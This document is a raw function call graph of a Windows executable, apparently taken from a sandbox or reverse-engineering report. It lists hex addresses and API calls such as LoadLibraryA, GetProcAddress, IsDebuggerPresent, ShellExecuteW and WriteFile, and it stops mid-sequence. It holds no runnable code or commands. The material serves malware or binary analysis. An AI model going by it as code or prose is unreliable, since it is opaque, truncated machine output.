_xtow_s@20 109119->109216 109121 ac3b45 109121->109039 109123 ab1dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 109122->109123 109125 ab1e00 __IsNonwritableInCurrentImage 109123->109125 109240 ab1b2a 52 API calls __cinit 109123->109240 109125->109043 109127 b023b5 109126->109127 109128 a9369c 109126->109128 109129 a936d6 IsThemeActive 109128->109129 109241 ab2025 109129->109241 109133 a93702 109253 a932de SystemParametersInfoW SystemParametersInfoW 109133->109253 109135 a9370e 109254 a9374e GetCurrentDirectoryW 109135->109254 109138 a9373b 109138->109047 109139->109021 109140->109025 109141->109033 109145->109048 109146->109051 109147->109057 109148->109059 109149->109063 109150->109064 109154 ab761d 109151->109154 109153 ab765a 109153->109068 109157 ab8b59 TlsSetValue 109153->109157 109154->109153 109155 ab763b Sleep 109154->109155 109160 ac3e5a 109154->109160 109156 ab7652 109155->109156 109156->109153 109156->109154 109157->109072 109158->109075 109159->109071 109161 ac3e65 109160->109161 109165 ac3e80 __calloc_impl 109160->109165 109162 ac3e71 109161->109162 109161->109165 109167 ab889e 47 API calls __getptd_noexit 109162->109167 109163 ac3e90 RtlAllocateHeap 109163->109165 109166 ac3e76 109163->109166 109165->109163 109165->109166 109166->109154 109167->109166 109169 ab89a8 EnterCriticalSection 109168->109169 109170 ab8995 109168->109170 109169->109079 109176 ab8a0c 109170->109176 109172 ab899b 109172->109169 109200 ab1d7b 47 API calls 3 library calls 109172->109200 109175->109084 109177 ab8a18 __tzset_nolock 109176->109177 109178 ab8a39 109177->109178 109179 ab8a21 109177->109179 109181 ab8a37 109178->109181 109187 ab8aa1 __tzset_nolock 109178->109187 109201 ab8e52 47 API calls 2 library calls 109179->109201 109181->109178 109204 ab7660 47 API calls std::exception::_Copy_str 109181->109204 109182 ab8a26 109202 ab8eb2 47 API calls 8 library calls 109182->109202 109185 ab8a4d 109188 ab8a63 109185->109188 109189 ab8a54 109185->109189 109186 ab8a2d 109203 ab1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 109186->109203 109187->109172 109190 ab8984 __lock 46 API calls 109188->109190 109205 ab889e 47 API calls __getptd_noexit 109189->109205 109194 ab8a6a 109190->109194 109193 ab8a59 109193->109187 109195 ab8a79 InitializeCriticalSectionAndSpinCount 109194->109195 109196 ab8a8e 109194->109196 109197 ab8a94 109195->109197 109206 ab28ca 109196->109206 109212 ab8aaa LeaveCriticalSection _doexit 109197->109212 109201->109182 109202->109186 109204->109185 109205->109193 109207 ab28d3 RtlFreeHeap 109206->109207 109208 ab28fc __dosmaperr 109206->109208 109207->109208 109209 ab28e8 109207->109209 109208->109197 109213 ab889e 47 API calls __getptd_noexit 109209->109213 109211 ab28ee GetLastError 109211->109208 109212->109187 109213->109211 109214->109100 109215->109107 109216->109119 109218 ab7abb 109217->109218 109223 ab7945 109218->109223 109222 ab7ad6 109222->109121 109224 ab795f _memset ___raise_securityfailure 109223->109224 109225 ab797f IsDebuggerPresent 109224->109225 109231 ab8e3c SetUnhandledExceptionFilter UnhandledExceptionFilter 109225->109231 109228 ab7a66 109230 ab8e27 GetCurrentProcess TerminateProcess 109228->109230 109229 ab7a43 ___raise_securityfailure 109232 abb4bf 109229->109232 109230->109222 109231->109229 109233 abb4c9 IsProcessorFeaturePresent 109232->109233 109234 abb4c7 109232->109234 109236 ac4560 109233->109236 109234->109228 109239 ac450f 5 API calls 2 library calls 109236->109239 109238 ac4643 109238->109228 109239->109238 109240->109125 109242 ab8984 __lock 47 API calls 109241->109242 109243 ab2030 109242->109243 109299 ab8ae8 LeaveCriticalSection 109243->109299 109245 a936fb 109246 ab208d 109245->109246 109247 ab20b1 109246->109247 109248 ab2097 109246->109248 109247->109133 109248->109247 109300 ab889e 47 API calls __getptd_noexit 109248->109300 109250 ab20a1 109301 ab7aa0 8 API calls _xtow_s@20 109250->109301 109252 ab20ac 109252->109133 109253->109135 109302 a94257 109254->109302 109256 a9377f IsDebuggerPresent 109257 a9378d 109256->109257 109258 b021b7 MessageBoxA 109256->109258 109260 b021d0 109257->109260 109261 a937aa 109257->109261 109290 a93852 109257->109290 109258->109260 109259 a93859 SetCurrentDirectoryW 109264 a93716 SystemParametersInfoW 109259->109264 109473 ad2f5b 48 API calls 109260->109473 109366 a93bff 109261->109366 109264->109138 109265 b021e0 109270 b021f6 SetCurrentDirectoryW 109265->109270 109267 a937c8 GetFullPathNameW 109378 a934f3 109267->109378 109270->109264 109271 a9380f 109272 a93818 109271->109272 109474 acbe31 AllocateAndInitializeSid CheckTokenMembership FreeSid 109271->109474 109393 a930a5 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 109272->109393 109276 b02213 109276->109272 109279 b02224 GetModuleFileNameW 109276->109279 109278 a93822 109281 a93837 109278->109281 109401 a93598 109278->109401 109280 a9caee 48 API calls 109279->109280 109282 b02245 109280->109282 109411 a9e1f0 109281->109411 109285 b02271 109282->109285 109286 b0224c 109282->109286 109478 a939e8 48 API calls 2 library calls 109285->109478 109475 a939e8 48 API calls 2 library calls 109286->109475 109290->109259 109291 b02257 109476 a939e8 48 API calls 2 library calls 109291->109476 109295 b02264 109477 a939e8 48 API calls 2 library calls 109295->109477 109296 b022a5 Mailbox 109296->109290 109298 b0226d GetForegroundWindow ShellExecuteW 109298->109296 109299->109245 109300->109250 109301->109252 109479 a93c70 109302->109479 109306 a94278 GetModuleFileNameW 109496 a934c1 109306->109496 109311 a9caee 48 API calls 109312 a942ba 109311->109312 109313 a9d380 55 API calls 109312->109313 109314 a942ca Mailbox 109313->109314 109315 a9caee 48 API calls 109314->109315 109316 a942f2 109315->109316 109317 a9d380 55 API calls 109316->109317 109318 a94305 Mailbox 109317->109318 109319 a9caee 48 API calls 109318->109319 109320 a94316 109319->109320 109511 a9d2d2 109320->109511 109322 a94328 Mailbox 109323 a9d3d2 48 API calls 109322->109323 109324 a9433b 109323->109324 109517 a94477 109324->109517 109328 a94355 109329 a9435f 109328->109329 109330 b020f7 109328->109330 109332 ab1bc7 _W_store_winword 59 API calls 109329->109332 109331 a94477 48 API calls 109330->109331 109333 b0210b 109331->109333 109334 a9436a 109332->109334 109336 a94477 48 API calls 109333->109336 109334->109333 109335 a94374 109334->109335 109337 ab1bc7 _W_store_winword 59 API calls 109335->109337 109338 b02127 109336->109338 109339 a9437f 109337->109339 109341 b0212f GetModuleFileNameW 109338->109341 109340 a94389 109339->109340 109339->109341 109343 ab1bc7 _W_store_winword 59 API calls 109340->109343 109342 a94477 48 API calls 109341->109342 109345 b02160 109342->109345 109344 a94394 109343->109344 109346 a943d6 109344->109346 109350 a94477 48 API calls 109344->109350 109353 b02185 _wcscpy 109344->109353 109347 a9c935 48 API calls 109345->109347 109348 a943e7 109346->109348 109346->109353 109349 b0216e 109347->109349 109354 a93320 48 API calls 109348->109354 109351 a94477 48 API calls 109349->109351 109352 a943b8 _wcscpy 109350->109352 109355 b0217d 109351->109355 109360 a94477 48 API calls 109352->109360 109356 a94477 48 API calls 109353->109356 109357 a943ff 109354->109357 109355->109353 109358 b021ab 109356->109358 109533 aa14a0 109357->109533 109358->109358 109360->109346 109361 aa14a0 48 API calls 109363 a9440f 109361->109363 109363->109361 109364 a94477 48 API calls 109363->109364 109365 a94451 Mailbox 109363->109365 109549 a97bef 48 API calls 109363->109549 109364->109363 109365->109256 109367 a93c1f 109366->109367 109368 b03ce4 _memset 109366->109368 110078 a931b8 109367->110078 109370 b03cf6 GetOpenFileNameW 109368->109370 109370->109367 109372 a937c0 109370->109372 109371 a93c28 110085 a93a67 SHGetMalloc 109371->110085 109372->109267 109372->109290 109374 a93c31 110090 a93b45 GetFullPathNameW 109374->110090 110166 a9a716 109378->110166 109380 a93501 109381 a93575 109380->109381 110177 a921dd 86 API calls 109380->110177 109381->109265 109381->109271 109383 a9350a 109383->109381 110178 a95460 88 API calls Mailbox 109383->110178 109385 a93513 109385->109381 109386 a93517 GetFullPathNameW 109385->109386 109387 a97e53 48 API calls 109386->109387 109388 a93541 109387->109388 109389 a97e53 48 API calls 109388->109389 109390 a9354e 109389->109390 109391 b066b4 _wcscat 109390->109391 109392 a97e53 48 API calls 109390->109392 109392->109381 109394 b021b0 109393->109394 109395 a9310f 109393->109395 110181 a9318a 109395->110181 109399 a93185 109400 a92e9d CreateWindowExW CreateWindowExW ShowWindow ShowWindow 109399->109400 109400->109278 109402 a935c3 _memset 109401->109402 110187 a938c4 109402->110187 109406 b045c2 Shell_NotifyIconW 109407 a93666 Shell_NotifyIconW 110191 a938e4 109407->110191 109409 a93648 109409->109406 109409->109407 109410 a9367b 109410->109281 109412 a9e216 109411->109412 109447 a9e226 Mailbox 109411->109447 109414 a9e670 109412->109414 109412->109447 109413 add520 86 API calls 109413->109447 110299 aaecee 346 API calls 109414->110299 109416 a9e4e7 109417 a93842 109416->109417 110300 a9322e 16 API calls 109416->110300 109417->109290 109472 a92b94 Shell_NotifyIconW _memset 109417->109472 109419 a9e681 109419->109417 109421 a9e68e 109419->109421 109420 a9e26c PeekMessageW 109420->109447 110301 aaec33 346 API calls Mailbox 109421->110301 109423 b05b13 Sleep 109423->109447 109424 a9e695 LockWindowUpdate DestroyWindow GetMessageW 109424->109417 109426 a9e6c7 109424->109426 109428 b062a7 TranslateMessage DispatchMessageW GetMessageW 109426->109428 109428->109428 109430 b062d7 109428->109430 109429 aacf79 49 API calls 109429->109447 109430->109417 109431 a9e657 PeekMessageW 109431->109447 109432 ab010a 48 API calls 109432->109447 109433 a9e517 timeGetTime 109433->109447 109435 a9c935 48 API calls 109435->109447 109436 b05dfc WaitForSingleObject 109439 b05e19 GetExitCodeProcess CloseHandle 109436->109439 109436->109447 109437 a9e641 TranslateMessage DispatchMessageW 109437->109431 109438 b06147 Sleep 109445 b05cce Mailbox 109438->109445 109439->109447 109440 a9d3d2 48 API calls 109440->109445 109441 a9e6cc timeGetTime 110302 aacf79 49 API calls 109441->110302 109442 b05feb Sleep 109442->109445 109445->109440 109445->109447 109448 aae3a5 timeGetTime 109445->109448 109449 b061de GetExitCodeProcess 109445->109449 109451 b05cea Sleep 109445->109451 109454 b05cd7 Sleep 109445->109454 109455 af8a48 108 API calls 109445->109455 109456 a91dce 107 API calls 109445->109456 109458 b06266 Sleep 109445->109458 109461 a9caee 48 API calls 109445->109461 109464 a9d380 55 API calls 109445->109464 110304 ad56dc 49 API calls Mailbox 109445->110304 110305 aacf79 49 API calls 109445->110305 110306 a91000 346 API calls 109445->110306 110345 aed12a 50 API calls 109445->110345 110346 ad8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 109445->110346 110347 ad6f5b 63 API calls 3 library calls 109445->110347 109447->109413 109447->109416 109447->109420 109447->109423 109447->109429 109447->109431 109447->109432 109447->109433 109447->109435 109447->109436 109447->109437 109447->109438 109447->109441 109447->109442 109447->109445 109447->109451 109469 a9caee 48 API calls 109447->109469 109470 a9d380 55 API calls 109447->109470 109471 a91000 322 API calls 109447->109471 110222 a9e7e0 109447->110222 110229 a9ea00 109447->110229 110279 aa44e0 109447->110279 110295 a9e7b0 346 API calls Mailbox 109447->110295 110296 aa3680 346 API calls 2 library calls 109447->110296 110297 aaf381 TranslateAcceleratorW 109447->110297 110298 aaed1a IsDialogMessageW GetClassLongW 109447->110298 110303 af8b20 48 API calls 109447->110303 110307 a9fa40 109447->110307 109448->109445 109452 b061f4 WaitForSingleObject 109449->109452 109453 b0620a CloseHandle 109449->109453 109451->109447 109452->109447 109452->109453 109453->109445 109454->109451 109455->109445 109456->109445 109458->109447 109461->109445 109464->109445 109469->109447 109470->109447 109471->109447 109472->109290 109473->109265 109474->109276 109475->109291 109476->109295 109477->109298 109478->109298 109480 a9d3d2 48 API calls 109479->109480 109481 a93c80 109480->109481 109482 a9a359 109481->109482 109483 a9a366 __ftell_nolock 109482->109483 109484 a97e53 48 API calls 109483->109484 109488 a9a4cc Mailbox 109483->109488 109485 a9a398 109484->109485 109494 a9a3ce Mailbox 109485->109494 109550 a9a4f6 109485->109550 109487 a9a49f 109487->109488 109489 a9caee 48 API calls 109487->109489 109488->109306 109491 a9a4c0 109489->109491 109490 a9caee 48 API calls 109490->109494 109554 a95b47 48 API calls _memmove 109491->109554 109492 a9a4f6 48 API calls 109492->109494 109494->109487 109494->109488 109494->109490 109494->109492 109553 a95b47 48 API calls _memmove 109494->109553 109555 a93f9b 109496->109555 109499 a934ea 109508 a98182 109499->109508 109502 b034c3 109504 ab28ca _free 47 API calls 109502->109504 109505 b034d0 109504->109505 109506 a93e39 84 API calls 109505->109506 109507 b034d9 109506->109507 109507->109507 109509 ab010a 48 API calls 109508->109509 109510 a942ad 109509->109510 109510->109311 109512 a9d30a 109511->109512 109513 a9d2df 109511->109513 109512->109322 109516 a9d2e6 109513->109516 110072 a9d349 53 API calls 109513->110072 109516->109512 110071 a9d349 53 API calls 109516->110071 109518 a9449a 109517->109518 109519 a94481 109517->109519 109521 a97e53 48 API calls 109518->109521 109520 a9c935 48 API calls 109519->109520 109522 a94347 109520->109522 109521->109522 109523 ab1bc7 109522->109523 109524 ab1c48 109523->109524 109525 ab1bd3 109523->109525 110075 ab1c5a 59 API calls 3 library calls 109524->110075 109532 ab1bf8 109525->109532 110073 ab889e 47 API calls __getptd_noexit 109525->110073 109528 ab1c55 109528->109328 109529 ab1bdf 110074 ab7aa0 8 API calls _xtow_s@20 109529->110074 109531 ab1bea 109531->109328 109532->109328 109534 aa1606 109533->109534 109536 aa14b2 109533->109536 109534->109363 109537 ab010a 48 API calls 109536->109537 109548 aa14be 109536->109548 109538 b05299 109537->109538 109539 ab010a 48 API calls 109538->109539 109547 b052a4 109539->109547 109540 aa14c9 109541 aa156d 109540->109541 109542 ab010a 48 API calls 109540->109542 109541->109363 109543 aa15af 109542->109543 109544 aa15c2 109543->109544 110076 aad6b4 48 API calls 109543->110076 109544->109363 109546 ab010a 48 API calls 109546->109547 109547->109546 109547->109548 109548->109540 110077 a9346e 48 API calls 109548->110077 109549->109363 109551 a9b8a7 48 API calls 109550->109551 109552 a9a501 109551->109552 109552->109485 109553->109494 109554->109488 109620 a93f5d 109555->109620 109560 b05830 109563 a93e39 84 API calls 109560->109563 109561 a93fc6 LoadLibraryExW 109630 a93e78 109561->109630 109565 b05837 109563->109565 109567 a93e78 3 API calls 109565->109567 109569 b0583f 109567->109569 109568 a93fed 109568->109569 109570 a93ff9 109568->109570 109656 a9417d 109569->109656 109572 a93e39 84 API calls 109570->109572 109574 a934e2 109572->109574 109574->109499 109579 adcc82 109574->109579 109576 b05866 109664 a941cb 109576->109664 109578 b05873 109580 a941a7 83 API calls 109579->109580 109581 adccf1 109580->109581 109845 adce59 109581->109845 109584 a9417d 64 API calls 109585 adcd1e 109584->109585 109586 a9417d 64 API calls 109585->109586 109587 adcd2e 109586->109587 109588 a9417d 64 API calls 109587->109588 109589 adcd49 109588->109589 109590 a9417d 64 API calls 109589->109590 109591 adcd64 109590->109591 109592 a941a7 83 API calls 109591->109592 109593 adcd7b 109592->109593 109594 ab45ec std::exception::_Copy_str 47 API calls 109593->109594 109595 adcd82 109594->109595 109596 ab45ec std::exception::_Copy_str 47 API calls 109595->109596 109597 adcd8c 109596->109597 109598 a9417d 64 API calls 109597->109598 109599 adcda0 109598->109599 109600 adc846 GetSystemTimeAsFileTime 109599->109600 109601 adcdb3 109600->109601 109602 adcddd 109601->109602 109603 adcdc8 109601->109603 109604 adcde3 109602->109604 109605 adce42 109602->109605 109606 ab28ca _free 47 API calls 109603->109606 109851 adc251 118 API calls __fcloseall 109604->109851 109608 ab28ca _free 47 API calls 109605->109608 109609 adcdce 109606->109609 109611 adcd07 109608->109611 109612 ab28ca _free 47 API calls 109609->109612 109610 adce3a 109613 ab28ca _free 47 API calls 109610->109613 109611->109502 109614 a93e39 109611->109614 109612->109611 109613->109611 109615 a93e4a 109614->109615 109616 a93e43 109614->109616 109618 a93e59 109615->109618 109619 a93e6a FreeLibrary 109615->109619 109852 ab4274 109616->109852 109618->109502 109619->109618 109669 a93f20 109620->109669 109624 a93f8d FreeLibrary 109625 a93f96 109624->109625 109627 ab4129 109625->109627 109626 a93f85 109626->109624 109626->109625 109677 ab413e 109627->109677 109629 a93fba 109629->109560 109629->109561 109756 a93eb3 109630->109756 109633 a93e9f 109635 a93ea8 FreeLibrary 109633->109635 109636 a93eb1 109633->109636 109635->109636 109637 a94010 109636->109637 109638 ab010a 48 API calls 109637->109638 109639 a94025 109638->109639 109764 a94bce 109639->109764 109641 a94031 _memmove 109642 a94129 109641->109642 109643 a94161 109641->109643 109647 a9406c 109641->109647 109767 a931f2 CreateStreamOnHGlobal 109642->109767 109778 add03f 93 API calls 109643->109778 109644 a941cb 57 API calls 109653 a94075 109644->109653 109647->109644 109648 a9417d 64 API calls 109648->109653 109650 a94109 109650->109568 109651 b05794 109652 a941a7 83 API calls 109651->109652 109654 b057a8 109652->109654 109653->109648 109653->109650 109653->109651 109773 a941a7 109653->109773 109655 a9417d 64 API calls 109654->109655 109655->109650 109657 a9418f 109656->109657 109658 b0587d 109656->109658 109802 ab44ae 109657->109802 109661 adc846 109822 adc6a0 109661->109822 109663 adc85c 109663->109576 109665 a941da 109664->109665 109666 b058bf 109664->109666 109827 ab4af5 109665->109827 109668 a941e2 109668->109578 109673 a93f32 109669->109673 109672 a93f08 LoadLibraryA GetProcAddress 109672->109626 109674 a93f28 109673->109674 109675 a93f3b LoadLibraryA 109673->109675 109674->109626 109674->109672 109675->109674 109676 a93f4c GetProcAddress 109675->109676 109676->109674 109680 ab414a __tzset_nolock 109677->109680 109678 ab415d 109725 ab889e 47 API calls __getptd_noexit 109678->109725 109680->109678 109682 ab418e 109680->109682 109681 ab4162 109726 ab7aa0 8 API calls _xtow_s@20 109681->109726 109696 abf278 109682->109696 109685 ab4193 109686 ab41a9 109685->109686 109687 ab419c 109685->109687 109689 ab41d3 109686->109689 109690 ab41b3 109686->109690 109727 ab889e 47 API calls __getptd_noexit 109687->109727 109710 abf390 109689->109710 109728 ab889e 47 API calls __getptd_noexit 109690->109728 109693 ab416d __tzset_nolock @_EH4_CallFilterFunc@8 109693->109629 109697 abf284 __tzset_nolock 109696->109697 109698 ab8984 __lock 47 API calls 109697->109698 109708 abf292 109698->109708 109699 abf302 109730 abf387 109699->109730 109700 abf309 109735 ab7660 47 API calls std::exception::_Copy_str 109700->109735 109703 abf310 109703->109699 109705 abf31f InitializeCriticalSectionAndSpinCount EnterCriticalSection 109703->109705 109704 abf37c __tzset_nolock 109704->109685 109705->109699 109706 ab8a0c __mtinitlocknum 47 API calls 109706->109708 109708->109699 109708->109700 109708->109706 109733 ab5ade 48 API calls __lock 109708->109733 109734 ab5b48 LeaveCriticalSection LeaveCriticalSection _doexit 109708->109734 109719 abf3b0 __wopenfile 109710->109719 109711 abf3ca 109740 ab889e 47 API calls __getptd_noexit 109711->109740 109712 abf585 109712->109711 109716 abf5e8 109712->109716 109714 abf3cf 109741 ab7aa0 8 API calls _xtow_s@20 109714->109741 109737 ac7179 109716->109737 109717 ab41de 109729 ab4200 LeaveCriticalSection LeaveCriticalSection _fseek 109717->109729 109719->109711 109719->109712 109742 ab247b 59 API calls 2 library calls 109719->109742 109721 abf57e 109721->109712 109743 ab247b 59 API calls 2 library calls 109721->109743 109723 abf59d 109723->109712 109744 ab247b 59 API calls 2 library calls 109723->109744 109725->109681 109726->109693 109727->109693 109728->109693 109729->109693 109736 ab8ae8 LeaveCriticalSection 109730->109736 109732 abf38e 109732->109704 109733->109708 109734->109708 109735->109703 109736->109732 109745 ac6961 109737->109745 109739 ac7192 109739->109717 109740->109714 109741->109717 109742->109721 109743->109723 109744->109712 109747 ac696d __tzset_nolock 109745->109747 109746 ac697f 109748 ab889e _xtow_s@20 47 API calls 109746->109748 109747->109746 109749 ac69b6 109747->109749 109750 ac6984 109748->109750 109752 ac6a28 __wsopen_helper 110 API calls 109749->109752 109751 ab7aa0 _xtow_s@20 8 API calls 109750->109751 109755 ac698e __tzset_nolock 109751->109755 109753 ac69d3 109752->109753 109754 ac69fc __wsopen_helper LeaveCriticalSection 109753->109754 109754->109755 109755->109739 109760 a93ec5 109756->109760 109759 a93ef0 LoadLibraryA GetProcAddress 109759->109633 109761 a93e91 109760->109761 109762 a93ece LoadLibraryA 109760->109762 109761->109633 109761->109759 109762->109761 109763 a93edf GetProcAddress 109762->109763 109763->109761 109765 ab010a 48 API calls 109764->109765 109766 a94be0 109765->109766 109766->109641 109768 a9320c FindResourceExW 109767->109768 109772 a93229 109767->109772 109769 b057d3 LoadResource 109768->109769 109768->109772 109770 b057e8 SizeofResource 109769->109770 109769->109772 109771 b057fc LockResource 109770->109771 109770->109772 109771->109772 109772->109647 109774 a941b6 109773->109774 109777 b0589d 109773->109777 109779 ab471d 109774->109779 109776 a941c4 109776->109653 109778->109647 109783 ab4729 __tzset_nolock 109779->109783 109780 ab4737 109792 ab889e 47 API calls __getptd_noexit 109780->109792 109782 ab475d 109794 ab5a9f 109782->109794 109783->109780 109783->109782 109785 ab473c 109793 ab7aa0 8 API calls _xtow_s@20 109785->109793 109786 ab4763 109800 ab468e 81 API calls 4 library calls 109786->109800 109789 ab4772 109801 ab4794 LeaveCriticalSection LeaveCriticalSection _fseek 109789->109801 109791 ab4747 __tzset_nolock 109791->109776 109792->109785 109793->109791 109795 ab5aaf 109794->109795 109796 ab5ad1 EnterCriticalSection 109794->109796 109795->109796 109797 ab5ab7 109795->109797 109798 ab5ac7 109796->109798 109799 ab8984 __lock 47 API calls 109797->109799 109798->109786 109799->109798 109800->109789 109801->109791 109805 ab44c9 109802->109805 109804 a941a0 109804->109661 109806 ab44d5 __tzset_nolock 109805->109806 109807 ab44eb _memset 109806->109807 109808 ab4518 109806->109808 109809 ab4510 __tzset_nolock 109806->109809 109818 ab889e 47 API calls __getptd_noexit 109807->109818 109810 ab5a9f __lock_file 48 API calls 109808->109810 109809->109804 109811 ab451e 109810->109811 109820 ab42eb 62 API calls 5 library calls 109811->109820 109814 ab4505 109819 ab7aa0 8 API calls _xtow_s@20 109814->109819 109815 ab4534 109821 ab4552 LeaveCriticalSection LeaveCriticalSection _fseek 109815->109821 109818->109814 109819->109809 109820->109815 109821->109809 109825 ab40da GetSystemTimeAsFileTime 109822->109825 109824 adc6af 109824->109663 109826 ab4108 __aulldiv 109825->109826 109826->109824 109828 ab4b01 __tzset_nolock 109827->109828 109829 ab4b0f 109828->109829 109830 ab4b24 109828->109830 109841 ab889e 47 API calls __getptd_noexit 109829->109841 109831 ab5a9f __lock_file 48 API calls 109830->109831 109833 ab4b2a 109831->109833 109843 ab479c 55 API calls 5 library calls 109833->109843 109834 ab4b14 109842 ab7aa0 8 API calls _xtow_s@20 109834->109842 109837 ab4b35 109844 ab4b55 LeaveCriticalSection LeaveCriticalSection _fseek 109837->109844 109839 ab4b47 109840 ab4b1f __tzset_nolock 109839->109840 109840->109668 109841->109834 109842->109840 109843->109837 109844->109839 109847 adce6d __tzset_nolock _wcscmp 109845->109847 109846 a9417d 64 API calls 109846->109847 109847->109846 109848 adc846 GetSystemTimeAsFileTime 109847->109848 109849 adcd03 109847->109849 109850 a941a7 83 API calls 109847->109850 109848->109847 109849->109584 109849->109611 109850->109847 109851->109610 109853 ab4280 __tzset_nolock 109852->109853 109854 ab42ac 109853->109854 109855 ab4294 109853->109855 109858 ab5a9f __lock_file 48 API calls 109854->109858 109860 ab42a4 __tzset_nolock 109854->109860 109881 ab889e 47 API calls __getptd_noexit 109855->109881 109857 ab4299 109882 ab7aa0 8 API calls _xtow_s@20 109857->109882 109861 ab42be 109858->109861 109860->109615 109865 ab4208 109861->109865 109866 ab422b 109865->109866 109867 ab4217 109865->109867 109868 ab4227 109866->109868 109884 ab3914 109866->109884 109924 ab889e 47 API calls __getptd_noexit 109867->109924 109883 ab42e3 LeaveCriticalSection LeaveCriticalSection _fseek 109868->109883 109870 ab421c 109925 ab7aa0 8 API calls _xtow_s@20 109870->109925 109877 ab4245 109901 abf782 109877->109901 109879 ab424b 109879->109868 109880 ab28ca _free 47 API calls 109879->109880 109880->109868 109881->109857 109882->109860 109883->109860 109885 ab3927 109884->109885 109886 ab394b 109884->109886 109885->109886 109887 ab35c3 __fputwc_nolock 47 API calls 109885->109887 109890 abf8e6 109886->109890 109888 ab3944 109887->109888 109926 abbd14 109888->109926 109891 ab423f 109890->109891 109892 abf8f3 109890->109892 109894 ab35c3 109891->109894 109892->109891 109893 ab28ca _free 47 API calls 109892->109893 109893->109891 109895 ab35cd 109894->109895 109896 ab35e2 109894->109896 110032 ab889e 47 API calls __getptd_noexit 109895->110032 109896->109877 109898 ab35d2 110033 ab7aa0 8 API calls _xtow_s@20 109898->110033 109900 ab35dd 109900->109877 109902 abf78e __tzset_nolock 109901->109902 109903 abf7ae 109902->109903 109904 abf796 109902->109904 109906 abf82b 109903->109906 109909 abf7d8 109903->109909 110049 ab886a 47 API calls __getptd_noexit 109904->110049 110053 ab886a 47 API calls __getptd_noexit 109906->110053 109907 abf79b 110050 ab889e 47 API calls __getptd_noexit 109907->110050 109913 abb6a0 ___lock_fhandle 49 API calls 109909->109913 109911 abf830 110054 ab889e 47 API calls __getptd_noexit 109911->110054 109915 abf7de 109913->109915 109914 abf838 110055 ab7aa0 8 API calls _xtow_s@20 109914->110055 109917 abf7fc 109915->109917 109918 abf7f1 109915->109918 110051 ab889e 47 API calls __getptd_noexit 109917->110051 110034 abf84c 109918->110034 109920 abf7a3 __tzset_nolock 109920->109879 109922 abf7f7 110052 abf823 LeaveCriticalSection __unlock_fhandle 109922->110052 109924->109870 109925->109868 109927 abbd20 __tzset_nolock 109926->109927 109928 abbd28 109927->109928 109929 abbd40 109927->109929 110024 ab886a 47 API calls __getptd_noexit 109928->110024 109931 abbdd5 109929->109931 109935 abbd72 109929->109935 110029 ab886a 47 API calls __getptd_noexit 109931->110029 109932 abbd2d 110025 ab889e 47 API calls __getptd_noexit 109932->110025 109951 abb6a0 109935->109951 109936 abbdda 110030 ab889e 47 API calls __getptd_noexit 109936->110030 109939 abbd78 109941 abbd8b 109939->109941 109942 abbd9e 109939->109942 109940 abbde2 110031 ab7aa0 8 API calls _xtow_s@20 109940->110031 109960 abbdf6 109941->109960 110026 ab889e 47 API calls __getptd_noexit 109942->110026 109945 abbd35 __tzset_nolock 109945->109886 109947 abbd97 110028 abbdcd LeaveCriticalSection __unlock_fhandle 109947->110028 109948 abbda3 110027 ab886a 47 API calls __getptd_noexit 109948->110027 109952 abb6ac __tzset_nolock 109951->109952 109953 abb6f9 EnterCriticalSection 109952->109953 109954 ab8984 __lock 47 API calls 109952->109954 109955 abb71f __tzset_nolock 109953->109955 109956 abb6d0 109954->109956 109955->109939 109957 abb6db InitializeCriticalSectionAndSpinCount 109956->109957 109958 abb6ed 109956->109958 109957->109958 109959 abb723 ___lock_fhandle LeaveCriticalSection 109958->109959 109959->109953 109961 abbe03 __ftell_nolock 109960->109961 109962 abbe5f 109961->109962 109963 abbe40 109961->109963 109987 abbe35 109961->109987 109966 abbeb8 109962->109966 109967 abbe9c 109962->109967 109965 ab886a __dosmaperr 47 API calls 109963->109965 109964 abb4bf _$I10_OUTPUT 6 API calls 109968 abc61e 109964->109968 109969 abbe45 109965->109969 109971 abbecf 109966->109971 109975 ac05df __lseeki64_nolock 49 API calls 109966->109975 109970 ab886a __dosmaperr 47 API calls 109967->109970 109968->109947 109972 ab889e _xtow_s@20 47 API calls 109969->109972 109974 abbea1 109970->109974 109973 ac49a2 __flswbuf 47 API calls 109971->109973 109976 abbe4c 109972->109976 109977 abbedd 109973->109977 109978 ab889e _xtow_s@20 47 API calls 109974->109978 109975->109971 109979 ab7aa0 _xtow_s@20 8 API calls 109976->109979 109980 abc1fe 109977->109980 109985 ab869d _wcstok 47 API calls 109977->109985 109981 abbea8 109978->109981 109979->109987 109982 abc56b WriteFile 109980->109982 109983 abc216 109980->109983 109984 ab7aa0 _xtow_s@20 8 API calls 109981->109984 109988 abc594 GetLastError 109982->109988 109993 abc1c3 109982->109993 109986 abc30d 109983->109986 109995 abc22c 109983->109995 109984->109987 109989 abbf03 GetConsoleMode 109985->109989 109997 abc416 109986->109997 110000 abc318 109986->110000 109987->109964 109988->109993 109989->109980 109991 abbf3c 109989->109991 109990 abc5ce 109990->109987 109992 ab889e _xtow_s@20 47 API calls 109990->109992 109991->109980 109994 abbf4c GetConsoleCP 109991->109994 109998 abc5f6 109992->109998 109993->109987 109993->109990 109999 abc5aa 109993->109999 109994->109993 110021 abbf75 109994->110021 109995->109990 109996 abc29c WriteFile 109995->109996 109996->109988 110001 abc2d9 109996->110001 109997->109990 110002 abc48b WideCharToMultiByte 109997->110002 110003 ab886a __dosmaperr 47 API calls 109998->110003 110004 abc5b1 109999->110004 110005 abc5c5 109999->110005 110000->109990 110006 abc391 WriteFile 110000->110006 110001->109993 110001->109995 110007 abc308 110001->110007 110002->109988 110016 abc4d2 110002->110016 110003->109987 110008 ab889e _xtow_s@20 47 API calls 110004->110008 110009 ab887d __dosmaperr 47 API calls 110005->110009 110006->109988 110010 abc3e0 110006->110010 110007->109993 110012 abc5b6 110008->110012 110009->109987 110010->109993 110010->110000 110010->110007 110011 abc4da WriteFile 110013 abc52d GetLastError 110011->110013 110011->110016 110014 ab886a __dosmaperr 47 API calls 110012->110014 110013->110016 110014->109987 110015 ab22a8 __chsize_nolock 57 API calls 110015->110021 110016->109993 110016->109997 110016->110007 110016->110011 110017 ac4ea7 59 API calls __chsize_nolock 110017->110021 110018 abc042 WideCharToMultiByte 110018->109993 110020 abc07d WriteFile 110018->110020 110019 abc0a9 110019->109988 110019->109993 110019->110021 110022 ac6634 WriteConsoleW CreateFileW __chsize_nolock 110019->110022 110023 abc0d4 